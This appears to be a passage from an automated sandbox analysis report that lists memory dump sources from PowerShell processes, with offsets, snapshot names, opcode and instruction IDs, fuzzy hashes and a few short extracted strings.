                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4fe2018ae3e26258f090b3f7ce4909733f4d91ae9c3d70705b59f61fbc54cb64
                                                                                          • Instruction ID: 58312e3512fe0925281186ac3eafc2ff6f813ddfde6287f84c8a349bf49c89b6
                                                                                          • Opcode Fuzzy Hash: 4fe2018ae3e26258f090b3f7ce4909733f4d91ae9c3d70705b59f61fbc54cb64
                                                                                          • Instruction Fuzzy Hash: ADA1087291EB8A8FE796DB6C88656F5BBD1EF5A250F1840FAD04DC71A3D914AC0883C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b34e927d49490ab7c09eba3b3bbfb07c4f393b94475c86701faa83e295ad1d4
                                                                                          • Instruction ID: 17903bffb9ec335cbc62855a341ed04620f6d08a80fcc565a551c11c4c8d1f87
                                                                                          • Opcode Fuzzy Hash: 0b34e927d49490ab7c09eba3b3bbfb07c4f393b94475c86701faa83e295ad1d4
                                                                                          • Instruction Fuzzy Hash: C8B1F67050DA8D8FDBA9DF28C8457E93BE1EF56350F04826EE44DC72A1CE75A844CB82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 59eecb3f88fd633e047d25077567d11e602fad2a11b5380b15115ebc7ef52311
                                                                                          • Instruction ID: 9e034232ff14c2973f603407f89944a8f483c66553be553b76dbf908a707d4f0
                                                                                          • Opcode Fuzzy Hash: 59eecb3f88fd633e047d25077567d11e602fad2a11b5380b15115ebc7ef52311
                                                                                          • Instruction Fuzzy Hash: 8261076190E7C58FE756976888606B5BFE1EF57250F0940FBD04DCB0E3DA28AC4AC392
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6f2acb9100f8242ffb6cf8517424c86ca6bbb4c250b884bb15492fbe789b1c6c
                                                                                          • Instruction ID: 442e72c360b097c25908da78f749d9884999e83669e38105f1a4b282fae04611
                                                                                          • Opcode Fuzzy Hash: 6f2acb9100f8242ffb6cf8517424c86ca6bbb4c250b884bb15492fbe789b1c6c
                                                                                          • Instruction Fuzzy Hash: 9A41B47190E7C98FD7529B6C88645A8BFA1EF1B350B0940FBD48DCB1E3D9286C49C392
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c87e3ef5ccdd829ff18e857a4dcf9fae381dfb38775017b698ab3a036ce23b73
                                                                                          • Instruction ID: 3539eb4ed6c6dec02b4873f89a59954e7f22cfe8b458ad654e47ecb816bb4a9d
                                                                                          • Opcode Fuzzy Hash: c87e3ef5ccdd829ff18e857a4dcf9fae381dfb38775017b698ab3a036ce23b73
                                                                                          • Instruction Fuzzy Hash: F231223161DB098FDB88EA1CC8829B573E1FB99311B10017DD48EC3663EA26F8468781
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0cc7fabbd3fc3df777a892ce679d747db94ac43b9bb3f04e1e6f5336cc7f05ff
                                                                                          • Instruction ID: 3435f14e4f7b6e0bec5f2024b057c07b18c4576b0c5e0beec3a9edfeabc69dc2
                                                                                          • Opcode Fuzzy Hash: 0cc7fabbd3fc3df777a892ce679d747db94ac43b9bb3f04e1e6f5336cc7f05ff
                                                                                          • Instruction Fuzzy Hash: 7831D662D1FACACBF3A9976C58251F8EAC1AF5A690F5881FAD44DC31E3DD086C0842C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1536203379.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab860000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f26459f76722be34e7459e008f4f2990abc60df1a30aac85f755643dcdde813c
                                                                                          • Instruction ID: b6b4d0407707c5f7c37953499306de9405173e70493efe5ed70dccaf0dcf28f3
                                                                                          • Opcode Fuzzy Hash: f26459f76722be34e7459e008f4f2990abc60df1a30aac85f755643dcdde813c
                                                                                          • Instruction Fuzzy Hash: 6321DC62A1EBCACBE3A9972C586157CA5C2EF5B690F4C80F9D04DC71A3ED18BC4942C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 62596bd741d1ed1f7dcfb0d408e18d871465cfb79aa906e6ec83d9febea90249
                                                                                          • Instruction ID: 7f3c7bd20bafa2e2850cd8fcf13dbe137035688041adc0e3a241f4ece21e8f82
                                                                                          • Opcode Fuzzy Hash: 62596bd741d1ed1f7dcfb0d408e18d871465cfb79aa906e6ec83d9febea90249
                                                                                          • Instruction Fuzzy Hash: 1031F93081A64ECEFBB59F15CC0ABF932A0FF46355F404539D40E862B2DA7A7949CA51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                          • Instruction ID: 660382aa73ed9cec6ff48ffca415072ce8159dd035f8700b1db7c0aabf740d6b
                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                          • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3661DA36E882CB45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1535188843.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffaab790000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c3d97c3b762e8d4dcababb34a315cf183926154f90eeb493eb2fa7bb84208684
                                                                                          • Instruction ID: 89afce89357d52280e218e4391eac892e7d2b1c81ced523cbad9bc91096cd047
                                                                                          • Opcode Fuzzy Hash: c3d97c3b762e8d4dcababb34a315cf183926154f90eeb493eb2fa7bb84208684
                                                                                          • Instruction Fuzzy Hash: 4DF0303275C6048FDB5CAA1CF8429B973E1EB99320B10456EE48BC2697D927F8468685
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 110f408be5b71d5470b71fc5bda21dbd7b1a9775fda89696684a512364f57792
                                                                                          • Instruction ID: 01e3457ff084c0c5e5b1c32d193a20a82ae8d59621bd17fc2ff5f186cf75372c
                                                                                          • Opcode Fuzzy Hash: 110f408be5b71d5470b71fc5bda21dbd7b1a9775fda89696684a512364f57792
                                                                                          • Instruction Fuzzy Hash: C7B16070E0021DCFDF14CFA9D98579EBBF2BF88304F148529E815AB254EBB4A945DB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e555f522a03a4d7f5a4c9a11fcb6f9530c123542c2b0983e29b61c9a2c9dcfbb
                                                                                          • Instruction ID: a9b9bf16a95a16eb3cf0719974ccb0ffbbf7a3671ac998230e6a96ff7c618ab5
                                                                                          • Opcode Fuzzy Hash: e555f522a03a4d7f5a4c9a11fcb6f9530c123542c2b0983e29b61c9a2c9dcfbb
                                                                                          • Instruction Fuzzy Hash: 24B19E70E0022DDFEB14CFA9D98179DBBF2AF48714F14852DD814AB254EBB4A941DB81
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                                                                                          • API String ID: 0-1185439275
                                                                                          • Opcode ID: eafb8fe3079187d0938fc107a5fe5a7a77d0c8bbe1813cfe95cf44389e68df1e
                                                                                          • Instruction ID: f7f60a02bab0340428c60252a90f2a08b2d9f6750335021692ab0054cd7f7ace
                                                                                          • Opcode Fuzzy Hash: eafb8fe3079187d0938fc107a5fe5a7a77d0c8bbe1813cfe95cf44389e68df1e
                                                                                          • Instruction Fuzzy Hash: A9123A71B043469FDB258B25DC507AABBB1FFC6211F19C0ABD865CF292DA31C846C7A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q
                                                                                          • API String ID: 0-2927452005
                                                                                          • Opcode ID: 5655546c17bb276a635fee5f4f7d5909cc965303fa3d9e095e6b35aed3cadf66
                                                                                          • Instruction ID: 9206a1543c7aee6200b2b334e55059f9a4d2091b3f637edeab07bc1e5302d8db
                                                                                          • Opcode Fuzzy Hash: 5655546c17bb276a635fee5f4f7d5909cc965303fa3d9e095e6b35aed3cadf66
                                                                                          • Instruction Fuzzy Hash: 3FE12CF1B003069FDB248B65DC597AAB7F2AFC5254F18C06AD8258F251DB39D841CBA2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                                                          • API String ID: 0-1794337482
                                                                                          • Opcode ID: 8b40ca30c70fb73ff396e95216616c71fce1fedabe5b14bc3be5ea7ecc5b531b
                                                                                          • Instruction ID: c34ac349e71c1db64814d225d4227107f914a106c64c091d560545d0960b49d6
                                                                                          • Opcode Fuzzy Hash: 8b40ca30c70fb73ff396e95216616c71fce1fedabe5b14bc3be5ea7ecc5b531b
                                                                                          • Instruction Fuzzy Hash: 78527EB4E00219DFDB24CF59C950BAAB7B2BB85304F1481AAD915AF755CB31DC82CFA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                                                                          • API String ID: 0-1794337482
                                                                                          • Opcode ID: a770106fe4eee2c0c64d301093510dcfa7d329e526c6867a2f05d41cc5a1b6f7
                                                                                          • Instruction ID: 99eeaf51a30a0470f683d86f3c496f614ca05c37c718884e018be6bde57c1362
                                                                                          • Opcode Fuzzy Hash: a770106fe4eee2c0c64d301093510dcfa7d329e526c6867a2f05d41cc5a1b6f7
                                                                                          • Instruction Fuzzy Hash: F8D18BB4E002099FD714DBA5C854B9EB7B2ABC9304F10C429E8116FB95CB75EC42CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q$4'q
                                                                                          • API String ID: 0-4210068417
                                                                                          • Opcode ID: 82a2cd619fa85e2704f367813162365f5fdebaf24d40e25408f2c06b7a5d88b0
                                                                                          • Instruction ID: b680fcd6b82900dfccf1b02f8201fc19c5a9ede6eb130227f9e59ab1129ef1e9
                                                                                          • Opcode Fuzzy Hash: 82a2cd619fa85e2704f367813162365f5fdebaf24d40e25408f2c06b7a5d88b0
                                                                                          • Instruction Fuzzy Hash: 921237B1B04316AFDB159B6D8C117AEB7B2AFC2214F14C07AD555CF691DA31C882CBA2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Hq$$q$$q
                                                                                          • API String ID: 0-405414136
                                                                                          • Opcode ID: 160cbcc6f703c0acbb1e068c7dfbcb76c59c6ebcfb19f22193cb2215e33f6854
                                                                                          • Instruction ID: 65e9340455e4d3f8b8ff8c05442b9b5a53d99d64ad41ae359c634a6cbc124d5d
                                                                                          • Opcode Fuzzy Hash: 160cbcc6f703c0acbb1e068c7dfbcb76c59c6ebcfb19f22193cb2215e33f6854
                                                                                          • Instruction Fuzzy Hash: 9D124234B002288FDB25EB65C9547AEB7B3BF89304F1544A9D40AAB351DF75AE85CF80
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$$q
                                                                                          • API String ID: 0-3927140803
                                                                                          • Opcode ID: ac4f9d5a67956acc9bee29b92222fb1c66f64db77081002aa96fc723ab5e53de
                                                                                          • Instruction ID: 7ee284c591df35a4a3a9ade4248c9fe77dd5470fc6c4fc4fb7cd451f7e6baafa
                                                                                          • Opcode Fuzzy Hash: ac4f9d5a67956acc9bee29b92222fb1c66f64db77081002aa96fc723ab5e53de
                                                                                          • Instruction Fuzzy Hash: 049138B1B043068FDB258B759C187AA7BB3AFC6214F1480ABD411CF6A2DB39DC42C761
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q$4'q
                                                                                          • API String ID: 0-3126650252
                                                                                          • Opcode ID: d82375b802ed78c296b6eb063a4b3140589bada39151a0ff220255226c517256
                                                                                          • Instruction ID: 14f3846126fba4d07c0b192a60a1fcb0e7457d37d8033e5a274b05b60944ac97
                                                                                          • Opcode Fuzzy Hash: d82375b802ed78c296b6eb063a4b3140589bada39151a0ff220255226c517256
                                                                                          • Instruction Fuzzy Hash: 35B19EB4E003099FDB14CF94C954B9EBBB2AF89304F14C429E8216F755CB39E846CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $q$$q$$q
                                                                                          • API String ID: 0-3067366958
                                                                                          • Opcode ID: 5002fd6e33f080643099a72ebe7ae380806af786a75e6d0dfd46f8915cff6359
                                                                                          • Instruction ID: 9b06b698f9f2d187704ec0ed8cd92de325bc2c36c266ca96ef62233f75e292c7
                                                                                          • Opcode Fuzzy Hash: 5002fd6e33f080643099a72ebe7ae380806af786a75e6d0dfd46f8915cff6359
                                                                                          • Instruction Fuzzy Hash: DD4115B6B002169FCB249B699C403ABF7F5EFC5214F28802ADC65EB344DA31DA41C7E1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $q$$q$$q
                                                                                          • API String ID: 0-3067366958
                                                                                          • Opcode ID: 1c1ff8f0af6989392bb88f210d04d5616e14ac3f7fa5a6360efa5473772adf34
                                                                                          • Instruction ID: 1da21092d0b1de7831bd8e58b89115a22a96618eeead22647474e99257dc9fa1
                                                                                          • Opcode Fuzzy Hash: 1c1ff8f0af6989392bb88f210d04d5616e14ac3f7fa5a6360efa5473772adf34
                                                                                          • Instruction Fuzzy Hash: F5214DF270031A5BDB34577A9C51767B7E6ABC1715F34802AE915CB381DD75C882C361
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q
                                                                                          • API String ID: 0-1467158625
                                                                                          • Opcode ID: 99dc5455676283f2adcb51a4383dfc63f5d880706efaad2bf03b16c0da01aca8
                                                                                          • Instruction ID: 2e8c3d33731866931773ffd9abc8c2cb8c00aa3c07cfacfcffb7e47cba4d1dd6
                                                                                          • Opcode Fuzzy Hash: 99dc5455676283f2adcb51a4383dfc63f5d880706efaad2bf03b16c0da01aca8
                                                                                          • Instruction Fuzzy Hash: B4925BB4A00215DFE724CB19C954F9AB7B2BB85308F14C0A9D919AF751DB31DD82CFA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q
                                                                                          • API String ID: 0-1467158625
                                                                                          • Opcode ID: dc5e66aad294c637863b44d7b29a6d36dc4df868c3866b9066ae42d688252e0f
                                                                                          • Instruction ID: e43a7851a7404c5b07e6828b34ecc6c1cac3de9726f39e462931387cec530c60
                                                                                          • Opcode Fuzzy Hash: dc5e66aad294c637863b44d7b29a6d36dc4df868c3866b9066ae42d688252e0f
                                                                                          • Instruction Fuzzy Hash: 56F18EB4A003199FE724DB64CD50FAAB7B2ABC5304F1080A5E519AFB95CB75DC81CFA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q$4'q
                                                                                          • API String ID: 0-1467158625
                                                                                          • Opcode ID: 7a647631f9921998b3de1d8a6766e28bbbc25d56b7c5f6c7acde5ab0ff26344c
                                                                                          • Instruction ID: 7761abf0cca2ad091855a814ccab58ac57ff4d56415d5a5b2b1a9042c32255c5
                                                                                          • Opcode Fuzzy Hash: 7a647631f9921998b3de1d8a6766e28bbbc25d56b7c5f6c7acde5ab0ff26344c
                                                                                          • Instruction Fuzzy Hash: C4715AB2B043468FD7158B799C546ABBBB2AFC6214F18C0BBD565CF252DA31C842C7A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $q$$q
                                                                                          • API String ID: 0-3126353813
                                                                                          • Opcode ID: 3467ad682b20fc3119ef1e9d2ed2095f1f5363ec2e9a4b1786b39364186e6a1a
                                                                                          • Instruction ID: c368dc016a039742b23d0397837bf412eeef16a0c6f62ac4a3a6ef65da4f47e2
                                                                                          • Opcode Fuzzy Hash: 3467ad682b20fc3119ef1e9d2ed2095f1f5363ec2e9a4b1786b39364186e6a1a
                                                                                          • Instruction Fuzzy Hash: 6E2157F33183862BDB3147295C807A3BBA5ABC2314F284067E9648B6D2DA69C885C375
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $q$$q
                                                                                          • API String ID: 0-3126353813
                                                                                          • Opcode ID: 29963e9cd03decd02a8e21de602aca055ecd8ca5fab03ca78f5ab7de8d446343
                                                                                          • Instruction ID: dd94a855a4b03171c26de052505465449d4e5ae832b674a6fc27d017171bae61
                                                                                          • Opcode Fuzzy Hash: 29963e9cd03decd02a8e21de602aca055ecd8ca5fab03ca78f5ab7de8d446343
                                                                                          • Instruction Fuzzy Hash: 2121F5B6A04656DFCB219F699D403ABBBF4FFC5210F1A41A6DC28E7241D231DA00C7A5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q
                                                                                          • API String ID: 0-1807707664
                                                                                          • Opcode ID: e5095603ff610820eb41738d9f9365e801da72b5f6d83fe7393894c51ac729a8
                                                                                          • Instruction ID: 2fd8d89efc223e98fb8a394682bded4c402ff85f5cb271e42c926d3f3e4a0980
                                                                                          • Opcode Fuzzy Hash: e5095603ff610820eb41738d9f9365e801da72b5f6d83fe7393894c51ac729a8
                                                                                          • Instruction Fuzzy Hash: 46724BB4A00215DFD714CB19C950F9AB7B2BB8A308F14C0A9D919AB752DB72ED81CF91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: W
                                                                                          • API String ID: 0-655174618
                                                                                          • Opcode ID: 211e8fad8388e426f17fd500d0def3edd9786133cb8c404988f25df9a1814f66
                                                                                          • Instruction ID: e05f7aaacfa39b6a13bb3b209646dbea492925bf49fef120887384f980418de5
                                                                                          • Opcode Fuzzy Hash: 211e8fad8388e426f17fd500d0def3edd9786133cb8c404988f25df9a1814f66
                                                                                          • Instruction Fuzzy Hash: F2225A74A002599FCB15CFA8C584AAEFBF2FF48310F248559E805AB365C775ED42CB90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q
                                                                                          • API String ID: 0-1807707664
                                                                                          • Opcode ID: 1bf81cb464234922ee3274e7637aa4af75ddbf19eb3b3034b379d6f2fb18e530
                                                                                          • Instruction ID: cf2077e5cf971777f64d00840f91a5c3c14e6a2b5bf8bc10560fa17cfda197fe
                                                                                          • Opcode Fuzzy Hash: 1bf81cb464234922ee3274e7637aa4af75ddbf19eb3b3034b379d6f2fb18e530
                                                                                          • Instruction Fuzzy Hash: E5222DB4A00215DFE714CB14C954FAAB7B2FB86308F14C099E919AB752DB72ED81CF91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'q
                                                                                          • API String ID: 0-1807707664
                                                                                          • Opcode ID: 0bcd215654da7ecf51a3146bbece5af51837cd4bbb12c377c202488a48383000
                                                                                          • Instruction ID: 95d0cf807ca377e7864cd3a63da92456de0ba7d9cd2a368feed2969f0a4f71eb
                                                                                          • Opcode Fuzzy Hash: 0bcd215654da7ecf51a3146bbece5af51837cd4bbb12c377c202488a48383000
                                                                                          • Instruction Fuzzy Hash: C541D2F1B04306CFDB24CF25DD88B6AB7F2AFC6254F148066D8258B655D73AD881C761
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1642822502.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_4c20000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c9ea867097c540ba828747f9bcbe9a73d7c757fe9d3f7d63e9dfcb23ffcda1a3
                                                                                          • Instruction ID: 6cc7597b9af23f0b1599ad78c66c934fcbf78bdf647121b4329e86166f577955
                                                                                          • Opcode Fuzzy Hash: c9ea867097c540ba828747f9bcbe9a73d7c757fe9d3f7d63e9dfcb23ffcda1a3
                                                                                          • Instruction Fuzzy Hash: 31D15B6290E3E06FD713AB7899B02D53FB1AF43224B0A41D3C491CF5B3D5589A4AC7E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1674121670.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
